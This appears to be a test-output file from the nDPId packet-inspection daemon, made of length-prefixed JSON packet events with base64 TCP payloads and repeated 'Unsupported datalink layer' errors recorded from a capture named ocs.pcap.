-00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":464,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMI8QABABoCtwKi0ArL40DbC2QBQ64tGkd7tm7+AECMCBqsAAAEBCAoANYttRwYSmQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":465,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652809269} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":465,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMI9QABABoCgwKi0ArL40DbC2QBQ64tGkd7tm7+wECMCyu4AAAEBCAoANYtzRwYSmQEBBQre7aEr3u2mlw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":466,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652809358} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":466,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMI+QABABoCfwKi0ArL40DbC2QBQ64tGkd7tm7+wECMCxXkAAAEBCAoANYt8RwYSmQEBBQre7aEr3u2sAw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":467,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652809553} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":467,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMI\/QABABoCqwKi0ArL40DbC2QBQ64tGkd7trAOAECMv9cEAAAEBCAoANYuPRwYS7w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":468,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652809627} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":468,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMJAQABABoCdwKi0ArL40DbC2QBQ64tGkd7trAOwECMvjqMAAAEBCAoANYuXRwYS7wEBBQre7bbb3u28Rw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":469,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652809697} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":469,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMJBQABABoCcwKi0ArL40DbC2QBQ64tGkd7tsW+wECNciN0AAAEBCAoANYueRwYTFQEBBQre7bbb3u28Rw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":470,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652809699} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":470,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMJCQABABoCnwKi0ArL40DbC2QBQ64tGkd7tvEeAECOK5O0AAAEBCAoANYueRwYTFQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":471,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652809700} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":471,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMJDQABABoCmwKi0ArL40DbC2QBQ64tGkd7twbOAECO331QAAAEBCAoANYueRwYTFQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":472,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652809762} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":472,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMJEQABABoClwKi0ArL40DbC2QBQ64tGkd7txx+AECPk2aMAAAEBCAoANYukRwYTJw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":473,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652809768} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":473,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMJFQABABoCkwKi0ArL40DbC2QBQ64tGkd7tzIuAECQR1AkAAAEBCAoANYulRwYTJw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":474,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652809768} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":474,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMJGQABABoCjwKi0ArL40DbC2QBQ64tGkd7t0feAECQ\/zm4AAAEBCAoANYulRwYTKA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":475,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652809809} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":475,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMJHQABABoCiwKi0ArL40DbC2QBQ64tGkd7t12OAECRsyMMAAAEBCAoANYupRwYTNg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":476,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652809811} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":476,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMJIQABABoChwKi0ArL40DbC2QBQ64tGkd7t3M+AECSZwycAAAEBCAoANYupRwYTOQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":477,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652809820} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":477,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMJJQABABoCgwKi0ArL40DbC2QBQ64tGkd7t4juAECTGvY4AAAEBCAoANYupRwYTOQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":478,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652809861} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":478,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMJKQABABoCfwKi0ArL40DbC2QBQ64tGkd7t56eAECT0t+cAAAEBCAoANYuuRwYTQQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":479,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652809863} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":479,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMJLQABABoCewKi0ArL40DbC2QBQ64tGkd7t7ROAECUhsk4AAAEBCAoANYuuRwYTQQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":480,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652809872} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":480,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMJMQABABoCdwKi0ArL40DbC2QBQ64tGkd7t8n+AECVOrLEAAAEBCAoANYuvRwYTRA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":481,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652809874} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":481,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMJNQABABoCcwKi0ArL40DbC2QBQ64tGkd7t9+uAECV7pxgAAAEBCAoANYuvRwYTRA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":482,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652809932} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":482,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMJOQABABoCPwKi0ArL40DbC2QBQ64tGkd7t9+uwECV7swMAAAEBCAoANYu1RwYTRAEBBQre7f1X3u4Cww=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":483,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652809972} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":483,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMJPQABABoCGwKi0ArL40DbC2QBQ64tGkd7t9+vQECV7v0cAAAEBCAoANYu5RwYTRAEBBRLe7ggv3u4Nm97t\/Vfe7gLD"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":484,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652810383} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":484,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMJQQABABoCNwKi0ArL40DbC2QBQ64tGkd7uAsOwECWpkbgAAAEBCAoANYviRwYTrAEBBQre7ggv3u4Nmw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":485,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652810466} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":485,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMJRQABABoCEwKi0ArL40DbC2QBQ64tGkd7uAsPQECWpiEcAAAEBCAoANYvrRwYTrAEBBRLe7hMH3u4Yc97uCC\/e7g2b"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":486,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652810471} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":486,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMJSQABABoCDwKi0ArL40DbC2QBQ64tGkd7uAsPQECWpgtsAAAEBCAoANYvrRwYTrAEBBRLe7hMH3u4d397uCC\/e7g2b"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":487,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652810537} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":487,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMJTQABABoCKwKi0ArL40DbC2QBQ64tGkd7uDZuwECXWa00AAAEBCAoANYvyRwYT5gEBBQre7hMH3u4d3w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":488,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652810615} -00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":488,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMJUQABABoCBwKi0ArL40DbC2QBQ64tGkd7uDZvQECXWQVYAAAEBCAoANYv5RwYT5gEBBRLe7iNL3u4ot97uEwfe7h3f"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":489,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652810689} -00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":489,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMJVQABABoCAwKi0ArL40DbC2QBQ64tGkd7uDZvQECXWO+IAAAEBCAoANYwBRwYT5gEBBRLe7iNL3u4uI97uEwfe7h3f"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":490,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652810747} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":490,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMJWQABABoB\/wKi0ArL40DbC2QBQ64tGkd7uDZvQECXWNnAAAAEBCAoANYwHRwYT5gEBBRLe7iNL3u4zj97uEwfe7h3f"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":491,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652810808} -00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":491,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMJXQABABoB+wKi0ArL40DbC2QBQ64tGkd7uDZvQECXWMP4AAAEBCAoANYwNRwYT5gEBBRLe7iNL3u44+97uEwfe7h3f"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":492,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652810862} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":492,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMJYQABABoCFwKi0ArL40DbC2QBQ64tGkd7uHd+wECYDLwYAAAEBCAoANYwSRwYUPAEBBQre7iNL3u44+w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":493,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652810888} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":493,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMJZQABABoCQwKi0ArL40DbC2QBQ64tGkd7uOPuAECYwY+gAAAEBCAoANYwVRwYUSQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":494,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652810889} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":494,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMJaQABABoCPwKi0ArL40DbC2QBQ64tGkd7uPmeAECZeXk4AAAEBCAoANYwVRwYUSQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":495,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652810935} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":495,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMJbQABABoCOwKi0ArL40DbC2QBQ64tGkd7uQ9OAECaLWKYAAAEBCAoANYwZRwYUVA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":496,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652810937} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":496,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMJcQABABoCNwKi0ArL40DbC2QBQ64tGkd7uST+AECa4UwwAAAEBCAoANYwaRwYUVA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":497,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652810938} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":497,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMJdQABABoCMwKi0ArL40DbC2QBQ64tGkd7uTquAECblTXMAAAEBCAoANYwaRwYUVA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":498,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652810997} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":498,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMJeQABABoCLwKi0ArL40DbC2QBQ64tGkd7uVBeAECcTR8wAAAEBCAoANYwgRwYUWw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":499,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652811023} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":499,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMJfQABABoB+wKi0ArL40DbC2QBQ64tGkd7uVBewECcTm2IAAAEBCAoANYwiRwYUWwEBBQre7lmD3u5e7w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":500,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652811082} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":500,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMJgQABABoB9wKi0ArL40DbC2QBQ64tGkd7uVBewECcTlfAAAAEBCAoANYwoRwYUWwEBBQre7lmD3u5kWw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":501,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652811156} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":501,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMJhQABABoB8wKi0ArL40DbC2QBQ64tGkd7uVBewECcTkHwAAAEBCAoANYwwRwYUWwEBBQre7lmD3u5pxw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":502,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652811200} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":502,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMJiQABABoCHwKi0ArL40DbC2QBQ64tGkd7uaceAECdAMaMAAAEBCAoANYw0RwYUkw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":503,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652815197} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":503,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMJjQABABoB6wKi0ArL40DbC2QBQ64tGkd7uacewECdAjoMAAAEBCAoANY3ERwYUkwEBBQre7lQX3u5Zgw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":504,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652815253} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":504,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMJkQABABoB5wKi0ArL40DbC2QBQ64tGkd7uacewECdAWEYAAAEBCAoANY3JRwYUkwEBBQre7m8z3u50nw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":505,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652815254} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":505,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMJlQABABoB4wKi0ArL40DbC2QBQ64tGkd7uacewECdAUtoAAAEBCAoANY3JRwYUkwEBBQre7m8z3u56Cw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":506,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652815324} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":506,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMJmQABABoCDwKi0ArL40DbC2QBQ64tGkd7ueguAECdtG5YAAAEBCAoANY3QRwYYkw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":507,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652815327} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":507,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMJnQABABoB2wKi0ArL40DbC2QBQ64tGkd7ueguwECdtOPUAAAEBCAoANY3RRwYYkwEBBQre7nSf3u56Cw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":508,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652815327} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":508,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMJoQABABoB1wKi0ArL40DbC2QBQ64tGkd7ueguwECdtI0UAAAEBCAoANY3RRwYYkwEBBQre7n933u6E4w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":509,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652815397} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":509,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMJpQABABoB0wKi0ArL40DbC2QBQ64tGkd7ueguwECdtHdIAAAEBCAoANY3YRwYYkwEBBQre7n933u6KTw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":510,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652815468} -00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":510,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMJqQABABoBrwKi0ArL40DbC2QBQ64tGkd7uegvQECdtGvoAAAEBCAoANY3fRwYYkwEBBRLe7o+73u6VJ97uf3fe7opP"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":511,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652818681} -00331{"packet_event_id":1,"packet_event_name":"packet","packet_id":511,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAPDy9QABABnyYwKi0AomHgzS0VhQCr\/++QwAAAACgAjkIx6AAAAIEBbQEAggKADWPIAAAAAABAwMG"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":512,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652820112} 